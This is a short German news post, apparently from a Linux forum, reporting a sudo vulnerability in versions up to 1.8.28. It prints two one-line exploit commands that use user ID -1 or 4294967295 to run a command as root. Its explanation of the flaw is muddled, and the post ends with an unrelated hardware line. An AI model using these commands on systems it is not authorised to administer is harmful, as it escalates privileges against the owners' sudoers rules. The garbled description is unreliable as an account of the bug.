Sicherheitsanfälligkeit in sudo

Ein Fehler in sudo ermöglicht es dem Benutzer root, jede ausführbare Datei auszuführen, wenn ihre Ausführung von anderen Benutzern in /etc/sudoers erlaubt ist und für root verboten ist.

Die Ausnutzung des Fehlers ist sehr einfach:

sudo -u#-1 id -u

oder:

sudo -u#4294967295 id -u

Der Fehler tritt in allen sudo-Versionen bis 1.8.28 auf.

Details:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Quelle: linux.org.ru

60GB SSD 8Gb DDR4